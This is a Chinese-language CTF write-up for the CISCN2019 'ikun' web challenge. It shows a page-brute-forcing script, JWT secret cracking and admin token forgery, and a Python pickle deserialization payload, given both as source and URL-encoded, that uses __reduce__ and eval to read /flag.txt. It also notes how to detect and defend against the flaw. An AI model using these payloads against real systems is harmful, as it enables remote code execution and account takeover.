• [CISCN2019 华北赛区 Day1 Web2]ikun


    [CISCN2019 华北赛区 Day1 Web2]ikun

    shopping

    在这里插入图片描述
    要买到lv6,然而当前页面上没有lv6,爆破页面来搞事情。

    import requests
    url="http://3ecc60d7-c14f-4805-9476-71bcd91747c8.node3.buuoj.cn/shop?page="
    
    for i in range(0,2000):
        print(i)
        r=requests.get( url + str(i) )
        if 'lv6.png' in r.text:
            print (i)
            break
    

    在这里插入图片描述
    抓包改折扣:
    在这里插入图片描述
    右边location显示/b1g_m4mber

    访问:
    在这里插入图片描述
    这里涉及到JWT伪造漏洞

    JWT伪造

    详情请参考大佬博客

    攻击工具
    首先建立docker,攻击jwt:
    在这里插入图片描述
    爆出来key:

    Secret is "1Kun"
    

    然后访问攻击网站,将jwt复制上去即可
    在这里插入图片描述
    把username改为admin,把key填为1Kun即可。
    然后将左边的jwt复制下来,填充进cookie模块即可:
    在这里插入图片描述
    刷新一下即可。

    然后找到源码,审计即可。
    在这里插入图片描述

    审计

    根据提示后门找到admin.py

    在这里插入图片描述
    pickle提供了一个简单的持久化功能。可以将对象以文件的形式存放在磁盘上。

    pickle模块只能在python中使用,python中几乎所有的数据类型(列表,字典,集合,类等)都可以用pickle来序列化,
    pickle序列化后的数据,可读性差,人一般无法识别。

    p = pickle.loads(urllib.unquote(become))

    urllib.unquote:将存入的字典参数编码为URL查询字符串,即转换成以key1 = value1 & key2 = value2的形式pickle.loads(bytes_object): 从字节对象中读取被封装的对象,并返回我看了师傅们的博客之后的理解就是,我们构建一个类,类里面的__reduce__python魔术方法会在该类被反序列化的时候会被调用Pickle模块中最常用的函数为:

    • pickle.dump(obj, file, [,protocol])
    函数的功能:将obj对象序列化存入已经打开的file中。
    参数讲解:
    obj:想要序列化的obj对象。
    file:文件名称。
    protocol:序列化使用的协议。如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。
    
    • pickle.load(file)
    函数的功能:将file中的对象序列化读出。
    参数讲解:
    file:文件名称。
    
    • pickle.dumps(obj[, protocol])
    函数的功能:将obj对象序列化为string形式,而不是存入文件中。
    参数讲解:
    obj:想要序列化的obj对象。
    protocal:如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。
    
    • pickle.loads(string)
    函数的功能:从string中读出序列化前的obj对象。
    参数讲解:
    string:文件名称。
    【注】 dump() 与 load() 相比 dumps() 和 loads() 还有另一种能力:dump()函数能一个接着一个地将几个对象序列化存储到同一个文件中,随后调用load()来以同样的顺序反序列化读出这些对象。而在__reduce__方法里面我们就进行读取flag.txt文件,并将该类序列化之后进行URL编码
    

    检测反序列化方法:

    全局搜索Python代码中是否含有关键字类似“import cPickle”或“import pickle”等,若存在则进一步确认是否调用cPickle.loads()或pickle.loads()且反序列化的参数可控。
    

    防御方法

    1、用更高级的接口__getnewargs()、__getstate__()、__setstate__()等代替__reduce__()魔术方法;
    2、进行反序列化操作之前,进行严格的过滤,若采用的是pickle库可采用装饰器实现。
    

    打洞

    import pickle
    import urllib
    
    class payload(object):
        def __reduce__(self):
           return (eval, ("open('/flag.txt','r').read()",))
    
    a = pickle.dumps(payload())
    a = urllib.quote(a)
    print a
    
    c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.
    

    在这里插入图片描述
    在这里插入图片描述

  • 相关阅读:
    java中有趣的unicode转义序列
    react父组件传入子组件的props不更新问题
    create-react-app修改端口号
    转移博客启动中。。。
    idea java界面设置中文
    记录一次 electronjs 12.0.0 安装运行出现cli.js出错、以及获取不到nodeapi的问题(解决办法:版本不对导致的)
    springboot 统一json返回格式,并设置http响应码
    springboot 统一json返回结构
    【Python】【PyPI】twine模块打包python项目上传pypi
    【GitHub】README.md自述文件配置
  • 原文地址:https://www.cnblogs.com/shenjuxian/p/13978773.html
Copyright © 2020-2023  润新知